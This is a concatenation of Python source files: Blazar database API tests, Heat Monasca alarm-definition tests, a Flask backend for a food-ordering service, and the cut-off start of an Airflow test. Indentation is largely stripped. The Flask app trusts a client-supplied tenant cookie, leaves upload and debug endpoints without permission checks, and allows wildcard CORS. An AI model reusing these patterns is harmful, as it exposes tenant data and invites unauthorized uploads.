self.assertEqual(2, len(db_api.host_allocation_get_all_by_values()))
self.assertEqual(1, len(db_api.host_allocation_get_all_by_values(
reservation_id='1234')))
# Event
def test_event_create(self):
fake_event_type = 'test_event'
test_event = db_api.event_create(_get_fake_event_values(
event_type=fake_event_type))
self.assertTrue(test_event)
self.assertEqual(fake_event_type, test_event.event_type)
def test_create_duplicated_event(self):
self.assertFalse(db_api.event_get('1'))
fake_values = _get_fake_event_values(id='1')
test_event = db_api.event_create(fake_values)
self.assertTrue(test_event)
self.assertRaises(db_exceptions.BlazarDBDuplicateEntry,
db_api.event_create, fake_values)
def test_event_update(self):
self.assertFalse(db_api.event_get('1'))
test_event = db_api.event_create(_get_fake_event_values(id='1'))
self.assertTrue(test_event)
test_event = db_api.event_update(test_event.id, {'status': 'changed'})
self.assertEqual('changed', test_event.status)
def test_event_destroy(self):
self.assertFalse(db_api.event_get('1'))
db_api.event_create(_get_fake_event_values(
id='1'))
self.assertTrue(db_api.event_get('1'))
db_api.event_destroy('1')
self.assertFalse(db_api.event_get('1'))
def test_destroy_for_event_not_found(self):
self.assertFalse(db_api.event_get('1'))
self.assertRaises(db_exceptions.BlazarDBNotFound,
db_api.event_destroy, '1')
def test_event_get_first_sorted_by_event_type_filter(self):
fake_event_type = 'test_event'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type
))
db_api.event_create(_get_fake_event_values(
id='3',
event_type=fake_event_type
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'event_type': fake_event_type}
)
self.assertEqual(fake_event_type, filtered_events.event_type)
self.assertEqual('2', filtered_events.id)
def test_event_get_first_sorted_by_status_filter(self):
fake_status = 'test_status'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='3',
status=fake_status
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'status': fake_status}
)
self.assertEqual(fake_status, filtered_events.status)
self.assertEqual('2', filtered_events.id)
def test_event_get_first_sorted_by_lease_id_filter(self):
fake_lease_id = '1234'
db_api.event_create(_get_fake_event_values(
id='1'
))
db_api.event_create(_get_fake_event_values(
id='2',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='3',
lease_id=fake_lease_id
))
filtered_events = db_api.event_get_first_sorted_by_filters(
sort_key='time',
sort_dir='asc',
filters={'lease_id': fake_lease_id}
)
self.assertEqual(fake_lease_id, filtered_events.lease_id)
self.assertEqual('2', filtered_events.id)
def test_event_get_sorted_asc_by_event_type_filter(self):
fake_event_type = 'test_event'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
event_type=fake_event_type,
time=datetime.datetime.utcnow()
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type,
time=datetime.datetime.utcnow()
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'event_type': fake_event_type}
)
self.assertEqual(2, len(filtered_events))
self.assertEqual(fake_event_type, filtered_events[0].event_type)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_status_filter(self):
fake_status = 'test_status'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'status': fake_status}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_status, filtered_events[0].status)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_lease_id_filter(self):
fake_lease_id = '1234'
sort_dir = 'asc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'lease_id': fake_lease_id}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_lease_id, filtered_events[0].lease_id)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_asc_by_time_filter(self):
def check_query(border, op, expected_ids):
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'time': {'border': _get_datetime(border),
'op': op}})
filtered_event_ids = [e.id for e in filtered_events]
self.assertListEqual(expected_ids, filtered_event_ids)
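# The 'time' filter takes a border datetime plus a comparison
# operator ('lt', 'le', 'gt', 'ge' or 'eq') which the DB API applies
# as: event.time <op> border.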
time1 = _get_datetime('2030-01-01 01:00')
time2 = _get_datetime('2030-01-01 02:00')
time3 = _get_datetime('2030-01-01 03:00')
sort_key = 'time'
sort_dir = 'asc'
db_api.event_create(_get_fake_event_values(id='1', time=time1))
db_api.event_create(_get_fake_event_values(id='2', time=time2))
db_api.event_create(_get_fake_event_values(id='3', time=time3))
check_query('2030-01-01 02:00', 'lt', ['1'])
check_query('2030-01-01 02:00', 'le', ['1', '2'])
check_query('2030-01-01 02:00', 'gt', ['3'])
check_query('2030-01-01 02:00', 'ge', ['2', '3'])
check_query('2030-01-01 02:00', 'eq', ['2'])
def test_event_get_sorted_desc_by_event_type_filter(self):
fake_event_type = 'test_event'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
event_type=fake_event_type
))
db_api.event_create(_get_fake_event_values(
id='2',
event_type=fake_event_type
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'event_type': fake_event_type}
)
self.assertEqual(2, len(filtered_events))
self.assertEqual(fake_event_type, filtered_events[0].event_type)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_status_filter(self):
fake_status = 'test_status'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
status=fake_status
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'status': fake_status}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_status, filtered_events[0].status)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_lease_id_filter(self):
fake_lease_id = '1234'
sort_dir = 'desc'
sort_key = 'time'
db_api.event_create(_get_fake_event_values(
id='1',
lease_id=fake_lease_id
))
db_api.event_create(_get_fake_event_values(
id='2'
))
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'lease_id': fake_lease_id}
)
self.assertEqual(1, len(filtered_events))
self.assertEqual(fake_lease_id, filtered_events[0].lease_id)
# testing sort
self.assertTrue(is_result_sorted_correctly(filtered_events,
sort_key=sort_key,
sort_dir=sort_dir))
def test_event_get_sorted_desc_by_time_filter(self):
def check_query(border, op, expected_ids):
filtered_events = db_api.event_get_all_sorted_by_filters(
sort_key=sort_key,
sort_dir=sort_dir,
filters={'time': {'border': _get_datetime(border),
'op': op}})
filtered_event_ids = [e.id for e in filtered_events]
self.assertListEqual(expected_ids, filtered_event_ids)
time1 = _get_datetime('2030-01-01 01:00')
time2 = _get_datetime('2030-01-01 02:00')
time3 = _get_datetime('2030-01-01 03:00')
sort_key = 'time'
sort_dir = 'desc'
db_api.event_create(_get_fake_event_values(id='1', time=time1))
db_api.event_create(_get_fake_event_values(id='2', time=time2))
db_api.event_create(_get_fake_event_values(id='3', time=time3))
check_query('2030-01-01 02:00', 'lt', ['1'])
check_query('2030-01-01 02:00', 'le', ['2', '1'])
check_query('2030-01-01 02:00', 'gt', ['3'])
check_query('2030-01-01 02:00', 'ge', ['3', '2'])
check_query('2030-01-01 02:00', 'eq', ['2'])
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from heat.engine.clients.os import monasca as client_plugin
from heat.engine import resource
from heat.engine.resources.openstack.monasca import alarm_definition
from heat.engine import stack
from heat.engine import template
from heat.tests import common
from heat.tests import utils
sample_template = {
'heat_template_version': '2015-10-15',
'resources': {
'test_resource': {
'type': 'OS::Monasca::AlarmDefinition',
'properties': {
'name': 'sample_alarm_id',
'description': 'sample alarm def',
'expression': 'sample expression',
'match_by': ['match_by'],
'severity': 'low',
'ok_actions': ['sample_notification'],
'alarm_actions': ['sample_notification'],
'undetermined_actions': ['sample_notification'],
'actions_enabled': False
}
}
}
}
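# The template above exercises every configurable property of the
# alarm definition resource; the tests below validate each value and
# the client calls it triggers.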
RESOURCE_TYPE = 'OS::Monasca::AlarmDefinition'
class MonascaAlarmDefinition(alarm_definition.MonascaAlarmDefinition):
"""This class overrides the is_service_available to return True.
Monasca service is not available by default. So, this class overrides
the is_service_available to return True.
"""
@classmethod
def is_service_available(cls, context):
return True
class MonascaAlarmDefinitionTest(common.HeatTestCase):
def setUp(self):
super(MonascaAlarmDefinitionTest, self).setUp()
self.ctx = utils.dummy_context()
        # As monascaclient is not part of requirements.txt, RESOURCE_TYPE is
        # not registered by default. For testing, it is registered here.
resource._register_class(RESOURCE_TYPE,
MonascaAlarmDefinition)
self.stack = stack.Stack(
self.ctx, 'test_stack',
template.Template(sample_template)
)
self.test_resource = self.stack['test_resource']
# Mock client
self.test_client = mock.MagicMock()
self.test_resource.client = mock.MagicMock(
return_value=self.test_client)
# Mock client plugin
self.test_client_plugin = client_plugin.MonascaClientPlugin(self.ctx)
self.test_client_plugin._create = mock.MagicMock(
return_value=self.test_client)
self.test_resource.client_plugin = mock.MagicMock(
return_value=self.test_client_plugin)
self.test_client_plugin.get_notification = mock.MagicMock(
return_value='sample_notification')
def _get_mock_resource(self):
value = dict(id='477e8273-60a7-4c41-b683-fdb0bc7cd152')
return value
def test_resource_handle_create(self):
mock_alarm_create = self.test_client.alarm_definitions.create
mock_alarm_patch = self.test_client.alarm_definitions.patch
mock_resource = self._get_mock_resource()
mock_alarm_create.return_value = mock_resource
# validate the properties
self.assertEqual(
'sample_alarm_id',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.NAME))
self.assertEqual(
'sample alarm def',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.DESCRIPTION))
self.assertEqual(
'sample expression',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.EXPRESSION))
self.assertEqual(
['match_by'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.MATCH_BY))
self.assertEqual(
'low',
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.SEVERITY))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.OK_ACTIONS))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.ALARM_ACTIONS))
self.assertEqual(
['sample_notification'],
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.UNDETERMINED_ACTIONS))
self.assertEqual(
False,
self.test_resource.properties.get(
alarm_definition.MonascaAlarmDefinition.ACTIONS_ENABLED))
self.test_resource.data_set = mock.Mock()
self.test_resource.handle_create()
# validate physical resource id
self.assertEqual(mock_resource['id'], self.test_resource.resource_id)
args = dict(
name='sample_alarm_id',
description='sample alarm def',
expression='sample expression',
match_by=['match_by'],
severity='low',
ok_actions=['sample_notification'],
alarm_actions=['sample_notification'],
undetermined_actions=['sample_notification']
)
mock_alarm_create.assert_called_once_with(**args)
mock_alarm_patch.assert_called_once_with(
alarm_id=self.test_resource.resource_id,
actions_enabled=False)
def test_resource_handle_update(self):
mock_alarm_patch = self.test_client.alarm_definitions.patch
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
prop_diff = {
alarm_definition.MonascaAlarmDefinition.NAME:
'name-updated',
alarm_definition.MonascaAlarmDefinition.DESCRIPTION:
'description-updated',
alarm_definition.MonascaAlarmDefinition.ACTIONS_ENABLED:
True,
alarm_definition.MonascaAlarmDefinition.SEVERITY:
'medium',
alarm_definition.MonascaAlarmDefinition.OK_ACTIONS:
['sample_notification'],
alarm_definition.MonascaAlarmDefinition.ALARM_ACTIONS:
['sample_notification'],
alarm_definition.MonascaAlarmDefinition.UNDETERMINED_ACTIONS:
['sample_notification']}
self.test_resource.handle_update(json_snippet=None,
tmpl_diff=None,
prop_diff=prop_diff)
args = dict(
alarm_id=self.test_resource.resource_id,
name='name-updated',
description='description-updated',
actions_enabled=True,
severity='medium',
ok_actions=['sample_notification'],
alarm_actions=['sample_notification'],
undetermined_actions=['sample_notification']
)
mock_alarm_patch.assert_called_once_with(**args)
def test_resource_handle_delete(self):
mock_alarm_delete = self.test_client.alarm_definitions.delete
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
mock_alarm_delete.return_value = None
self.assertIsNone(self.test_resource.handle_delete())
mock_alarm_delete.assert_called_once_with(
alarm_id=self.test_resource.resource_id
)
def test_resource_handle_delete_resource_id_is_none(self):
self.test_resource.resource_id = None
self.assertIsNone(self.test_resource.handle_delete())
def test_resource_handle_delete_not_found(self):
        # TODO(skraynev): remove this once the monasca client is merged
        # into global requirements
class NotFound(Exception):
pass
client_plugin.monasca_exc = mock.Mock()
client_plugin.monasca_exc.NotFound = NotFound
self.test_resource.resource_id = '477e8273-60a7-4c41-b683-fdb0bc7cd151'
mock_alarm_delete = self.test_client.alarm_definitions.delete
mock_alarm_delete.side_effect = client_plugin.monasca_exc.NotFound
self.assertIsNone(self.test_resource.handle_delete())
def test_resource_show_resource(self):
mock_notification_get = self.test_client.alarm_definitions.get
mock_notification_get.return_value = {}
self.assertEqual({},
self.test_resource._show_resource(),
'Failed to show resource')
|
|
import os
import sys
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__))))
from urllib.parse import unquote
from uuid import uuid4
from flask import Flask, session, render_template, send_file, make_response, request, redirect, g, current_app
from flask_login import login_required, UserMixin, login_user, logout_user, current_user
from flask_mail import Mail
from flask_pymongo import PyMongo
from flask_restful import Api
from flask_babel import Babel
from werkzeug.utils import secure_filename
from service.ProductService import ProductService
from service.StoreService import StoreService
from service.TenantService import TenantService
from service.UserService import UserService
from libs.flask_googlelogin import GoogleLogin
from flask_principal import Principal, Permission, Identity, AnonymousIdentity
from flask_principal import identity_loaded, identity_changed, RoleNeed, UserNeed
from flask_cors import CORS
from bson import ObjectId, json_util
import json
import pdfkit
from oauth2client import client, crypt
from flogging import logging, setup_logging
setup_logging()
logger = logging.getLogger(__name__)
logger.info("Starting flask app...")
app = Flask(__name__, instance_relative_config=False)
app.config.from_pyfile('foodbeazt.cfg', silent=True)
if os.environ.get('FOODBEAZT_CONFIG', None) is not None:
logger.info("Loading config from %(logfile)s", {'logfile': os.environ.get('FOODBEAZT_CONFIG')})
app.config.from_envvar('FOODBEAZT_CONFIG')
# CORS
cors = CORS(app, resources={r"/api/*": {"origins": "*"}}) # , send_wildcard=True)
# Mongodb
mongo = PyMongo()
# mongo.init_app(app) is deferred to init_mongo_db() below
api = Api(app)
# MAIL
mail = Mail(app)
# Setup Google Federated Auth
auth = GoogleLogin(app)
# load the extension
principals = Principal(app)
# Create a permission with a single Need, in this case a RoleNeed.
admin_permission = Permission(RoleNeed('tenant_admin'))
store_admin_permission = Permission(RoleNeed('store_admin'))
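# Usage sketch: a Flask-Principal permission can guard a view directly via
# its standard require() decorator (hypothetical route shown for illustration):
#
#   @app.route('/admin/reports')
#   @admin_permission.require(http_exception=403)
#   def admin_reports():
#       ...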
# localization
babel = Babel(app)
@app.before_first_request
def init_mongo_db():
logger.info("Initializing mongodb")
mongo.init_app(app)
@babel.localeselector
def get_locale():
return g.get('current_lang', 'en')
@app.route('/oauth2callback')
@auth.oauth2callback
def oauth_callback(token, userinfo, **params):
create_or_update_user(userinfo)
return redirect('/admin')
@identity_loaded.connect_via(app)
def on_identity_loaded(sender, identity):
# Set the identity user object
identity.user = current_user
# Add the UserNeed to the identity
if hasattr(current_user, 'id'):
identity.provides.add(UserNeed(current_user.id))
# Assuming the User model has a list of roles, update the
# identity with the roles that the user provides
if hasattr(current_user, 'roles'):
for role in current_user.roles:
identity.provides.add(RoleNeed(role))
def create_or_update_user(user_info):
user = get_or_create_user(user_info)
user_mixin = getUserMixin(user)
if user_mixin.name != "Guest":
login_user(user_mixin)
# Tell Flask-Principal the identity changed
identity_changed.send(current_app._get_current_object(), identity=Identity(str(user_mixin.id)))
return user_mixin
def login_anonymous():
return create_or_update_user({
'id': 'guest@foodbeazt.in',
'name': 'Guest',
'email': 'guest@foodbeazt.in',
'roles': ['member']
})
def getUserMixin(user):
if user is None:
return None
tenant_id = request.cookies.get('tenant_id', None)
if not tenant_id:
tenant_id = user.get('tenant_id', None)
else:
tenant_id = unquote(tenant_id).replace('"', '')
return User(user['_id'], tenant_id, user['name'], user['email'], user['roles'],
user.get('tenant_id', None), user.get('identity', None))
def default_tenantId():
return TenantService(mongo.db).get_by_name("FoodBeazt")['_id']
def get_or_create_user(item):
service = UserService(mongo.db)
email = item['email']
prev = service.get_by_email(email)
if prev:
return prev
logger.info("Creating new user...[%s]" % email)
tenant_id = default_tenantId()
if email == app.config['SUPER_ADMIN_EMAIL']:
roles = ["tenant_admin", 'member']
else:
roles = ["member"]
user = {
'username': email,
'email': email,
'name': item['name'],
'auth_type': 'google',
'tenant_id': tenant_id,
'roles': roles,
'identity': item.get('id', item.get('sub', None))
}
service.create(user)
return user
@auth.user_loader
def get_user(userid):
if request and request.path.startswith('/static/'):
return None
user = UserService(mongo.db).get_by_id(userid)
return getUserMixin(user)
def login_via_google_token(token):
if token == 'null':
return None
try:
idinfo = client.verify_id_token(token, auth.client_id)
if idinfo['aud'] not in [auth.client_id]:
raise crypt.AppIdentityError("Unrecognized client.")
if idinfo['iss'] not in ['accounts.google.com', 'https://accounts.google.com']:
raise crypt.AppIdentityError("Wrong issuer.")
if 'hd' in idinfo and idinfo['hd'] not in ['foodbeazt.in', 'localhost']:
raise crypt.AppIdentityError("Wrong hosted domain.")
return getUserMixin(get_or_create_user(idinfo))
except crypt.AppIdentityError as e:
logger.exception(e)
return None
@auth.request_loader
def request_loader(request):
if request and request.path.startswith('/static/'):
return None
user_mixin = None
userService = UserService(mongo.db)
authHeader = request.headers.get('Authorization', None)
if authHeader and len(authHeader) > 0:
if authHeader.startswith('Bearer '):
user_mixin = login_via_google_token(authHeader.replace('Bearer ', ''))
if user_mixin is None and session and session.get('identity.id', None) is not None:
logger.info("[%s] Using session stored user. Id: %s" % (request.path, session['identity.id']))
userid = str(session['identity.id'])
user_mixin = getUserMixin(userService.get_by_id(userid))
if user_mixin:
login_user(user_mixin)
identity_changed.send(current_app._get_current_object(), identity=Identity(str(user_mixin.id)))
logger.info("[%s] User login success: %s %s" % (request.path, user_mixin.id, user_mixin.name))
return user_mixin
# logger.info("Anonymous login initiated############### %s" % (request.path))
return login_anonymous()
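# Authentication flow sketch: API clients send a Google ID token, e.g.
#   curl -H "Authorization: Bearer <google-id-token>" https://<host>/api/orders/
# Requests without a valid token fall back to the session-stored user, and
# finally to the anonymous guest user above.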
class User(UserMixin):
def __init__(self, user_id=None, tenant_id=None, name=None, email=None,
                 roles=None, user_tenant_id=None,
identity=None):
self.id = user_id
self.user_id = user_id
self.tenant_id = tenant_id
self.name = name
self.email = email
        self.roles = roles if roles is not None else []  # avoid shared mutable default
self.user_tenant_id = user_tenant_id
self.identity = identity
def is_authenticated(self):
return not self.is_anonymous()
def is_anonymous(self):
return self.email in [None, "-1", "", 'guest@foodbeazt.in']
@app.before_request
def set_user_on_request_g():
setattr(g, 'user', current_user)
@api.representation('application/json')
def mjson(data, code, headers=None):
d = json.dumps(data, default=json_util.default)
resp = make_response(d, code)
resp.headers.extend(headers or {})
return resp
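# Sketch: bson.json_util.default lets responses carry BSON types that the
# stock JSON encoder rejects, e.g. json.dumps({'_id': ObjectId()},
# default=json_util.default) yields '{"_id": {"$oid": "..."}}'.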
@app.route("/")
def home():
return redirect('/admin')
@app.route("/login")
def login():
return current_app.login_manager.unauthorized()
@app.route("/test_order_email")
def test_order_email():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id)}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
return render_template("email/order_created.html", order=order)
@app.route("/test_order_delivered")
def test_order_delivered():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id), 'status': 'DELIVERED'}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
return render_template("email/order_delivered.html", order=order)
@app.route("/admin")
def admin_home():
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
if not admin_permission.can():
doLogout()
return "You are unauthorized to access this page! Sorry :(", 403
return render_template('admin/index.jinja2')
@app.route('/logout')
@app.route('/logout/')
def app_logout():
doLogout()
return redirect('/logout_success')
@app.route('/logout_success')
def logout_success():
return render_template('admin/logout.jinja2')
def doLogout():
logout_user()
# Tell Flask-Principal the user is anonymous
identity_changed.send(current_app._get_current_object(), identity=AnonymousIdentity())
session.clear()
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
export_data_folder = os.path.join(APP_ROOT, 'uploads', 'export')
import_data_folder = os.path.join(APP_ROOT, 'uploads', 'import')
product_upload_folder = os.path.join(APP_ROOT, 'static/images/products/')
store_upload_folder = os.path.join(APP_ROOT, 'static/images/stores/')
invoice_emails_folder = os.path.join(APP_ROOT, 'invoice_emails')
@app.route("/test_order_invoice")
def test_order_invoice():
logger.info("test order invoice")
tenant_id = g.user.tenant_id
try:
query = {'tenant_id': ObjectId(tenant_id), 'status': 'DELIVERED'}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
config = pdfkit.configuration(wkhtmltopdf='/usr/local/bin/wkhtmltopdf'.encode('utf-8'))
html_text = render_template("email/order_invoice.html", order=order)
output_filename = os.path.join(invoice_emails_folder, "Invoice-%s.pdf" % (order['order_no']))
pdfkit.from_string(html_text, output_filename, configuration=config)
return send_file(output_filename, mimetype='application/pdf')
except Exception as e:
logger.exception(e)
return "Error in generating PDF invoice"
def allowed_files(filename):
    # use rsplit so names with multiple dots are judged by their final extension
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ['jpg', 'png', 'gif', 'jpeg', 'bmp']
@app.route("/api/upload_product_image/<string:_id>", methods=['GET', 'POST'])
def upload_product_image(_id):
service = ProductService(mongo.db)
item = service.get_by_id(_id)
if item and request.files and len(request.files) > 0 and request.files['file']:
if 'image_url' in item and item['image_url']:
fname = os.path.join(product_upload_folder, item['image_url'])
if os.path.isfile(fname):
os.remove(fname)
file_body = request.files['file']
if allowed_files(secure_filename(file_body.filename)):
            filename = secure_filename(str(uuid4()) + "." + file_body.filename.rsplit('.', 1)[1])
item['image_url'] = filename
file_body.save(os.path.join(product_upload_folder, filename))
service.update(item)
return json.dumps({"status": "success", "id": _id, "filename": filename})
else:
print("file type not allowed")
return '', 404
@app.route("/api/upload_store_image/<string:_id>", methods=['GET', 'POST'])
def upload_store_image(_id):
service = StoreService(mongo.db)
item = service.get_by_id(_id)
if item and request.files and len(request.files) > 0 and request.files['file']:
if 'image_url' in item and item['image_url']:
fname = os.path.join(store_upload_folder, item['image_url'])
if os.path.isfile(fname):
os.remove(fname)
file_body = request.files['file']
if allowed_files(secure_filename(file_body.filename)):
            filename = secure_filename(str(uuid4()) + "." + file_body.filename.rsplit('.', 1)[1])
item['image_url'] = filename
file_body.save(os.path.join(store_upload_folder, filename))
service.save(item)
return json.dumps({"status": "success", "id": _id, "filename": filename})
return '', 404
@app.template_filter('datetime')
def _jinja2_filter_datetime(value, fmt=None):
if value is None:
return ''
if fmt is None or len(fmt) == 0:
        fmt = '%b %d, %Y %H:%M'  # %M is minutes; %m (month) was a typo here
return value.strftime(fmt)
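# Usage sketch inside a Jinja2 template (hypothetical variable name):
#   {{ order.created_at|datetime }}             -> "Apr 18, 2020 13:30"
#   {{ order.created_at|datetime('%Y-%m-%d') }} -> "2020-04-18"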
from foodbeazt.resources.subscription import SubscriptionApi, SubscriptionListApi
from foodbeazt.resources.tenant import TenantListApi, TenantApi
from foodbeazt.resources.user import UserApi, UserListApi
from foodbeazt.resources.store import StoreApi, StoreListApi, StoreCuisineApi
from foodbeazt.resources.store_review import StoreReviewApi
from foodbeazt.resources.product import ProductApi, ProductListApi, ProductActivateApi
from foodbeazt.resources.order import OrderApi, TrackOrderApi
from foodbeazt.resources.coupon import ValidateCouponApi
from foodbeazt.resources.order_list import OrderListApi
from foodbeazt.resources.store_order_list import StoreOrderListApi
from foodbeazt.resources.order_status import OrderStatusApi
from foodbeazt.resources.export_data import ExportDataApi
from foodbeazt.resources.popular_items import PopularItemsApi
from foodbeazt.resources.popular_stores import PopularStoresApi
from foodbeazt.resources.sms import SmsApi
from foodbeazt.resources.report import ReportApi, PaymentReportApi
from foodbeazt.resources.pincodes import PincodeListApi, PincodeApi
from foodbeazt.resources.myorders import MyOrdersApi
from foodbeazt.resources.push_notify import RegisterPushNotify, UnRegisterPushNotify
from foodbeazt.resources.store_order_status import StoreOrderStatusApi
from foodbeazt.resources.store_order_report import StoreOrderReportApi
from foodbeazt.resources.user_stores import UserStores
from foodbeazt.resources.settings import SettingsApi
@app.route('/test_new_order_notify')
def test_new_order_notify():
tenant_id = g.user.tenant_id
query = {'tenant_id': ObjectId(tenant_id)}
order = [x for x in mongo.db.order_collection.find(query).sort("created_at", -1)][0]
try:
api = OrderApi()
api.notify_new_order(order)
return json_util.dumps({'status': 'success', 'order': order})
except Exception as e:
logger.exception(e)
return json_util.dumps({'status': 'error', 'message': "Error in generating PDF invoice"})
api.add_resource(MyOrdersApi, '/api/my_orders')
api.add_resource(ReportApi, '/api/reports/orders')
api.add_resource(PaymentReportApi, '/api/reports/payment')
api.add_resource(SmsApi, '/api/sms')
api.add_resource(PincodeListApi, '/api/pincodes')
api.add_resource(PincodeApi, '/api/pincode/<string:_id>')
api.add_resource(PopularItemsApi, '/api/popular_items/<string:_id>')
api.add_resource(PopularStoresApi, '/api/popular_stores/<string:_id>')
api.add_resource(ExportDataApi, '/api/data_manage')
api.add_resource(SubscriptionApi, '/api/subscribe/<string:email>')
api.add_resource(SubscriptionListApi, '/api/subscriptions')
api.add_resource(TenantApi, '/api/tenant/<string:_id>')
api.add_resource(TenantListApi, '/api/tenants')
api.add_resource(UserApi, '/api/user/<string:_id>')
api.add_resource(UserListApi, '/api/users')
api.add_resource(StoreApi, '/api/store/<string:_id>')
api.add_resource(StoreReviewApi, '/api/store/<string:store_id>/review')
api.add_resource(StoreListApi, '/api/stores')
api.add_resource(StoreCuisineApi, '/api/stores/cuisines')
api.add_resource(ProductApi, '/api/product/<string:store_id>/<string:_id>')
api.add_resource(ProductActivateApi, '/api/product/activate/<string:store_id>/<string:_id>')
api.add_resource(ProductListApi, '/api/products/<string:store_id>')
api.add_resource(OrderApi, '/api/order/<string:_id>')
api.add_resource(OrderListApi, '/api/orders/')
api.add_resource(StoreOrderListApi, '/api/store_orders/<string:store_id>')
api.add_resource(TrackOrderApi, '/api/track/<string:order_no>')
api.add_resource(OrderStatusApi, '/api/order_status/<string:_id>')
api.add_resource(StoreOrderStatusApi, '/api/store_order_status')
api.add_resource(StoreOrderReportApi, '/api/store_order_reports/<string:store_id>')
api.add_resource(UserStores, '/api/user_stores')
api.add_resource(RegisterPushNotify, '/api/push_service/register')
api.add_resource(UnRegisterPushNotify, '/api/push_service/unregister')
api.add_resource(ValidateCouponApi, '/api/validate/coupon')
api.add_resource(SettingsApi, '/api/settings')
from views.payment import PaymentListApi, PaymentRedirectView, PaymentSuccessView, PaymentWebHookView
api.add_resource(PaymentListApi, '/api/payments')
app.add_url_rule('/api/payment/order', view_func=PaymentRedirectView.as_view('payment_redirect'))
app.add_url_rule('/api/payment/success', view_func=PaymentSuccessView.as_view('payment_success'))
app.add_url_rule('/api/payment/failure', view_func=PaymentSuccessView.as_view('payment_failure'))
app.add_url_rule('/api/payment/hook', view_func=PaymentWebHookView.as_view('payment_webhook'))
logger.info("APPLICATION LOADED SUCCESSFULLY!!")
|
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import os
import unittest
import mock
from google.auth.environment_vars import CREDENTIALS
from mock import PropertyMock
from parameterized import parameterized
from airflow import AirflowException
from airflow.models import Connection
from airflow.providers.cncf.kubernetes.operators.kubernetes_pod import KubernetesPodOperator
from airflow.providers.google.cloud.operators.kubernetes_engine import (
